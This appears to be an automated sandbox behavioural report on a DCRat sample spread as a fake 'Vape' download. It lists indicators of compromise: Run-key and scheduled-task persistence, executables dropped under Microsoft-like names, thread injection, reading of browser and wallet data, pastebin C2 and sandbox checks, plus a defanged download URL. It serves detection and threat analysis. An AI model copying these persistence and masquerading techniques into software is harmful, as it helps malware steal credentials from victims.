dcrat | hxxps://oxy[.]st/d/koRh

System Information Discovery

Processes:

Msvchost.exeWScript.exeIntoref.exeVape.exeMicrosoft_Protection.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	Msvchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	Intoref.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	Vape.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	Microsoft_Protection.exe

Drops startup file 2 IoCs

Processes:

Msvchost.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft_WindowsDefender.lnk	Msvchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft_WindowsDefender.lnk	Msvchost.exe

Executes dropped EXE 12 IoCs

Processes:

Vape.exeMicrosoft_Protection.exeMicrosoft_crypt.exeMicrosoft_R.exeMicrosoft_R.exeMicrosoft_M.exeMsvchost.exeMicrosoft_M.exeIntoref.exelhhsgwktkatl.exerar.exerar.exe

pid	process
5972	Vape.exe
5504	Microsoft_Protection.exe
6892	Microsoft_crypt.exe
5044	Microsoft_R.exe
5864	Microsoft_R.exe
5068	Microsoft_M.exe
4372	Msvchost.exe
5836	Microsoft_M.exe
3180	Intoref.exe
1840	lhhsgwktkatl.exe
4064	rar.exe
7052	rar.exe

Loads dropped DLL 32 IoCs

Processes:

Microsoft_R.exeMicrosoft_M.exe

pid	process
5864	Microsoft_R.exe
5864	Microsoft_R.exe
5836	Microsoft_M.exe
5836	Microsoft_M.exe
5864	Microsoft_R.exe
5864	Microsoft_R.exe
5836	Microsoft_M.exe
5836	Microsoft_M.exe
5864	Microsoft_R.exe
5864	Microsoft_R.exe
5864	Microsoft_R.exe
5864	Microsoft_R.exe
5864	Microsoft_R.exe
5864	Microsoft_R.exe
5864	Microsoft_R.exe
5864	Microsoft_R.exe
5864	Microsoft_R.exe
5864	Microsoft_R.exe
5864	Microsoft_R.exe
5864	Microsoft_R.exe
5836	Microsoft_M.exe
5836	Microsoft_M.exe
5836	Microsoft_M.exe
5836	Microsoft_M.exe
5836	Microsoft_M.exe
5836	Microsoft_M.exe
5836	Microsoft_M.exe
5836	Microsoft_M.exe
5836	Microsoft_M.exe
5836	Microsoft_M.exe
5836	Microsoft_M.exe
5836	Microsoft_M.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 63 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/5864-5584-0x00007FFB45C10000-0x00007FFB461F9000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50682\python311.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50682\_ctypes.pyd	upx
behavioral1/memory/5836-5664-0x00007FFB5EB00000-0x00007FFB5EB0F000-memory.dmp	upx
behavioral1/memory/5836-5663-0x00007FFB58B20000-0x00007FFB58B43000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50682\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50682\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50682\_queue.pyd	upx
behavioral1/memory/5864-5672-0x00007FFB47D40000-0x00007FFB47EB0000-memory.dmp	upx
behavioral1/memory/5864-5680-0x00007FFB47C20000-0x00007FFB47D3C000-memory.dmp	upx
behavioral1/memory/5864-5679-0x00007FFB58AF0000-0x00007FFB58AFD000-memory.dmp	upx
behavioral1/memory/5864-5678-0x00007FFB579C0000-0x00007FFB579D4000-memory.dmp	upx
behavioral1/memory/5836-5700-0x00007FFB417E0000-0x00007FFB41DC9000-memory.dmp	upx
behavioral1/memory/5836-5712-0x00007FFB57C50000-0x00007FFB57C5D000-memory.dmp	upx
behavioral1/memory/5836-5715-0x00007FFB47B60000-0x00007FFB47C18000-memory.dmp	upx
behavioral1/memory/5836-5714-0x00007FFB3EB90000-0x00007FFB3EF09000-memory.dmp	upx
behavioral1/memory/5836-5718-0x00007FFB57A50000-0x00007FFB57A5D000-memory.dmp	upx
behavioral1/memory/5836-5721-0x00007FFB45A10000-0x00007FFB45B2C000-memory.dmp	upx
behavioral1/memory/5864-5719-0x00007FFB578F0000-0x00007FFB57913000-memory.dmp	upx
behavioral1/memory/5864-5875-0x00007FFB57BC0000-0x00007FFB57BD9000-memory.dmp	upx
behavioral1/memory/5836-7143-0x00007FFB46860000-0x00007FFB469D0000-memory.dmp	upx
behavioral1/memory/5836-7142-0x00007FFB57160000-0x00007FFB57183000-memory.dmp	upx
behavioral1/memory/5836-7144-0x00007FFB56D40000-0x00007FFB56D59000-memory.dmp	upx
behavioral1/memory/5864-5877-0x00007FFB47340000-0x00007FFB476B9000-memory.dmp	upx
behavioral1/memory/5864-5876-0x00007FFB57890000-0x00007FFB578BE000-memory.dmp	upx
behavioral1/memory/5864-5878-0x00007FFB572D0000-0x00007FFB57388000-memory.dmp	upx
behavioral1/memory/5864-5720-0x00007FFB47D40000-0x00007FFB47EB0000-memory.dmp	upx
behavioral1/memory/5836-5717-0x00007FFB56B50000-0x00007FFB56B64000-memory.dmp	upx
behavioral1/memory/5836-5716-0x00007FFB58B20000-0x00007FFB58B43000-memory.dmp	upx
behavioral1/memory/5836-5713-0x00007FFB56BB0000-0x00007FFB56BDE000-memory.dmp	upx
behavioral1/memory/5864-5711-0x00007FFB5B7C0000-0x00007FFB5B7E3000-memory.dmp	upx
behavioral1/memory/5836-5710-0x00007FFB56D40000-0x00007FFB56D59000-memory.dmp	upx
behavioral1/memory/5836-5699-0x00007FFB46860000-0x00007FFB469D0000-memory.dmp	upx
behavioral1/memory/5836-5698-0x00007FFB57160000-0x00007FFB57183000-memory.dmp	upx
behavioral1/memory/5864-5697-0x00007FFB45C10000-0x00007FFB461F9000-memory.dmp	upx
behavioral1/memory/5836-5696-0x00007FFB57190000-0x00007FFB571A9000-memory.dmp	upx
behavioral1/memory/5836-5695-0x00007FFB571B0000-0x00007FFB571DD000-memory.dmp	upx
behavioral1/memory/5864-5677-0x00007FFB572D0000-0x00007FFB57388000-memory.dmp	upx
behavioral1/memory/5864-5676-0x00007FFB47340000-0x00007FFB476B9000-memory.dmp	upx
behavioral1/memory/5864-5675-0x00007FFB57890000-0x00007FFB578BE000-memory.dmp	upx
behavioral1/memory/5864-5674-0x00007FFB5B420000-0x00007FFB5B42D000-memory.dmp	upx
behavioral1/memory/5864-5673-0x00007FFB57BC0000-0x00007FFB57BD9000-memory.dmp	upx
behavioral1/memory/5864-5671-0x00007FFB578F0000-0x00007FFB57913000-memory.dmp	upx
behavioral1/memory/5864-5670-0x00007FFB5B320000-0x00007FFB5B339000-memory.dmp	upx
behavioral1/memory/5864-5669-0x00007FFB57CA0000-0x00007FFB57CCD000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50682\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50682\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50682\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50682\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50682\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50682\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50682\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50682\libssl-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50682\libcrypto-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50682\libffi-8.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50442\_ssl.pyd	upx
behavioral1/memory/5864-5626-0x00007FFB60900000-0x00007FFB6090F000-memory.dmp	upx
behavioral1/memory/5864-5624-0x00007FFB5B7C0000-0x00007FFB5B7E3000-memory.dmp	upx
behavioral1/memory/5836-5620-0x00007FFB417E0000-0x00007FFB41DC9000-memory.dmp	upx
behavioral1/memory/5836-7163-0x00007FFB47B60000-0x00007FFB47C18000-memory.dmp	upx
behavioral1/memory/5836-7162-0x00007FFB3EB90000-0x00007FFB3EF09000-memory.dmp	upx
behavioral1/memory/5836-7161-0x00007FFB56BB0000-0x00007FFB56BDE000-memory.dmp	upx
behavioral1/memory/5836-7177-0x00007FFB45A10000-0x00007FFB45B2C000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Msvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft_WindowsDefender = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft_WindowsDefender.exe"	Msvchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

1581 pastebin.com
1588 pastebin.com
1580 pastebin.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1572 ip-api.com

flow	ioc
1581	pastebin.com
1588	pastebin.com
1580	pastebin.com

flow	ioc
1572	ip-api.com

Drops file in System32 directory 4 IoCs

Processes:

Microsoft_crypt.exepowershell.exelhhsgwktkatl.exe

description	ioc	process
File opened for modification	C:\Windows\system32\MRT.exe	Microsoft_crypt.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	lhhsgwktkatl.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

Microsoft_crypt.exelhhsgwktkatl.exe

description	pid	process	target process
PID 6892 set thread context of 2252	6892	Microsoft_crypt.exe	schtasks.exe
PID 1840 set thread context of 3712	1840	lhhsgwktkatl.exe	dialer.exe
PID 1840 set thread context of 5756	1840	lhhsgwktkatl.exe	dialer.exe
PID 1840 set thread context of 1696	1840	lhhsgwktkatl.exe	dialer.exe

Drops file in Program Files directory 11 IoCs

Processes:

Intoref.exe

description	ioc	process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\explorer.exe	Intoref.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\ja-JP\Microsoft_R.exe	Intoref.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\it-IT\explorer.exe	Intoref.exe
File created	C:\Program Files (x86)\Internet Explorer\it-IT\7a0fd90576e088	Intoref.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Idle.exe	Intoref.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\6ccacd8608530f	Intoref.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\7a0fd90576e088	Intoref.exe
File created	C:\Program Files\Windows Media Player\WmiPrvSE.exe	Intoref.exe
File created	C:\Program Files\Windows Media Player\24dbde2999530e	Intoref.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\ja-JP\2dd33e406c384d	Intoref.exe
File created	C:\Program Files (x86)\Internet Explorer\it-IT\explorer.exe	Intoref.exe

Drops file in Windows directory 2 IoCs

Processes:

Intoref.exe

description	ioc	process
File created	C:\Windows\PrintDialog\microsoft.system.package.metadata\Autogen\unsecapp.exe	Intoref.exe
File created	C:\Windows\PrintDialog\microsoft.system.package.metadata\Autogen\29c1c3cc0f7685	Intoref.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

4120 sc.exe
344 sc.exe
456 sc.exe
1452 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4120	sc.exe
344	sc.exe
456	sc.exe
1452	sc.exe

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Driver	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Driver	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	wmiprvse.exe

Checks processor information in registry 2 TTPs 16 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

firefox.exefirefox.exewmiprvse.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe

Creates scheduled task(s) 1 TTPs 31 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

pid	process
7000	schtasks.exe
7140	schtasks.exe
6664	schtasks.exe
976	schtasks.exe
2736	schtasks.exe
5368	schtasks.exe
5360	schtasks.exe
6216	schtasks.exe
2288	schtasks.exe
3784	schtasks.exe
5516	schtasks.exe
5764	schtasks.exe
5408	schtasks.exe
3828	schtasks.exe
1728	schtasks.exe
5600	schtasks.exe
2140	schtasks.exe
6660	schtasks.exe
3904	schtasks.exe
6164	schtasks.exe
1972	schtasks.exe
5448	schtasks.exe
4984	schtasks.exe
2076	schtasks.exe
2692	schtasks.exe
892	schtasks.exe
6972	schtasks.exe
1100	schtasks.exe
6724	schtasks.exe
2252	schtasks.exe
5212	schtasks.exe

Detects videocard installed 1 TTPs 6 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exe

pid process

1916 WMIC.exe
6652 WMIC.exe
2680 WMIC.exe
5356 WMIC.exe
2692 WMIC.exe
6352 WMIC.exe
Enumerates processes with tasklist 1 TTPs 8 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

1604 tasklist.exe
3264 tasklist.exe
6412 tasklist.exe
3004 tasklist.exe
4668 tasklist.exe
5580 tasklist.exe
5032 tasklist.exe
3096 tasklist.exe
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

wmiprvse.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exesysteminfo.exe

pid process

2400 systeminfo.exe
5608 systeminfo.exe

pid	process
1916	WMIC.exe
6652	WMIC.exe
2680	WMIC.exe
5356	WMIC.exe
2692	WMIC.exe
6352	WMIC.exe

pid	process
1604	tasklist.exe
3264	tasklist.exe
6412	tasklist.exe
3004	tasklist.exe
4668	tasklist.exe
5580	tasklist.exe
5032	tasklist.exe
3096	tasklist.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

pid	process
2400	systeminfo.exe
5608	systeminfo.exe

Modifies data under HKEY_USERS 50 IoCs

Processes:

powershell.exedialer.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe

Modifies registry class 3 IoCs

Processes:

firefox.exeMicrosoft_Protection.exeIntoref.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings	Microsoft_Protection.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings	Intoref.exe

NTFS ADS 2 IoCs

Processes:

firefox.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\Vape v4.12.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Vape.exe:Zone.Identifier	firefox.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeMicrosoft_crypt.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeIntoref.exedialer.exelhhsgwktkatl.exepowershell.exepowershell.exepowershell.exe

pid	process
6792	powershell.exe
6680	powershell.exe
6680	powershell.exe
6792	powershell.exe
4092	powershell.exe
4092	powershell.exe
5796	powershell.exe
5796	powershell.exe
4092	powershell.exe
5796	powershell.exe
5428	powershell.exe
5428	powershell.exe
6892	Microsoft_crypt.exe
4056	powershell.exe
4056	powershell.exe
4500	powershell.exe
4500	powershell.exe
4692	powershell.exe
4692	powershell.exe
3572	powershell.exe
3572	powershell.exe
2316	powershell.exe
2316	powershell.exe
4500	powershell.exe
4056	powershell.exe
4056	powershell.exe
4692	powershell.exe
3572	powershell.exe
2316	powershell.exe
3180	Intoref.exe
3180	Intoref.exe
3180	Intoref.exe
3180	Intoref.exe
3180	Intoref.exe
3180	Intoref.exe
3180	Intoref.exe
3180	Intoref.exe
3180	Intoref.exe
3180	Intoref.exe
3180	Intoref.exe
3180	Intoref.exe
3180	Intoref.exe
6892	Microsoft_crypt.exe
6892	Microsoft_crypt.exe
6892	Microsoft_crypt.exe
6892	Microsoft_crypt.exe
6892	Microsoft_crypt.exe
6892	Microsoft_crypt.exe
6892	Microsoft_crypt.exe
2252	dialer.exe
2252	dialer.exe
6892	Microsoft_crypt.exe
6892	Microsoft_crypt.exe
6892	Microsoft_crypt.exe
1840	lhhsgwktkatl.exe
6584	powershell.exe
6584	powershell.exe
6584	powershell.exe
1756	powershell.exe
1756	powershell.exe
1756	powershell.exe
3772	powershell.exe
3772	powershell.exe
3772	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

firefox.exeAUDIODG.EXEMsvchost.exepowershell.exepowershell.exeWMIC.exetasklist.exetasklist.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1952	firefox.exe
Token: SeDebugPrivilege	1952	firefox.exe
Token: 33	5284	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5284	AUDIODG.EXE
Token: SeDebugPrivilege	1952	firefox.exe
Token: SeDebugPrivilege	1952	firefox.exe
Token: SeDebugPrivilege	1952	firefox.exe
Token: SeDebugPrivilege	1952	firefox.exe
Token: SeDebugPrivilege	1952	firefox.exe
Token: SeDebugPrivilege	4372	Msvchost.exe
Token: SeDebugPrivilege	6680	powershell.exe
Token: SeDebugPrivilege	6792	powershell.exe
Token: SeIncreaseQuotaPrivilege	1780	WMIC.exe
Token: SeSecurityPrivilege	1780	WMIC.exe
Token: SeTakeOwnershipPrivilege	1780	WMIC.exe
Token: SeLoadDriverPrivilege	1780	WMIC.exe
Token: SeSystemProfilePrivilege	1780	WMIC.exe
Token: SeSystemtimePrivilege	1780	WMIC.exe
Token: SeProfSingleProcessPrivilege	1780	WMIC.exe
Token: SeIncBasePriorityPrivilege	1780	WMIC.exe
Token: SeCreatePagefilePrivilege	1780	WMIC.exe
Token: SeBackupPrivilege	1780	WMIC.exe
Token: SeRestorePrivilege	1780	WMIC.exe
Token: SeShutdownPrivilege	1780	WMIC.exe
Token: SeDebugPrivilege	1780	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1780	WMIC.exe
Token: SeRemoteShutdownPrivilege	1780	WMIC.exe
Token: SeUndockPrivilege	1780	WMIC.exe
Token: SeManageVolumePrivilege	1780	WMIC.exe
Token: 33	1780	WMIC.exe
Token: 34	1780	WMIC.exe
Token: 35	1780	WMIC.exe
Token: 36	1780	WMIC.exe
Token: SeDebugPrivilege	4668	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1780	WMIC.exe
Token: SeSecurityPrivilege	1780	WMIC.exe
Token: SeTakeOwnershipPrivilege	1780	WMIC.exe
Token: SeLoadDriverPrivilege	1780	WMIC.exe
Token: SeSystemProfilePrivilege	1780	WMIC.exe
Token: SeSystemtimePrivilege	1780	WMIC.exe
Token: SeProfSingleProcessPrivilege	1780	WMIC.exe
Token: SeIncBasePriorityPrivilege	1780	WMIC.exe
Token: SeCreatePagefilePrivilege	1780	WMIC.exe
Token: SeBackupPrivilege	1780	WMIC.exe
Token: SeRestorePrivilege	1780	WMIC.exe
Token: SeShutdownPrivilege	1780	WMIC.exe
Token: SeDebugPrivilege	1780	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1780	WMIC.exe
Token: SeRemoteShutdownPrivilege	1780	WMIC.exe
Token: SeUndockPrivilege	1780	WMIC.exe
Token: SeManageVolumePrivilege	1780	WMIC.exe
Token: 33	1780	WMIC.exe
Token: 34	1780	WMIC.exe
Token: 35	1780	WMIC.exe
Token: 36	1780	WMIC.exe
Token: SeDebugPrivilege	5580	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3240	WMIC.exe
Token: SeSecurityPrivilege	3240	WMIC.exe
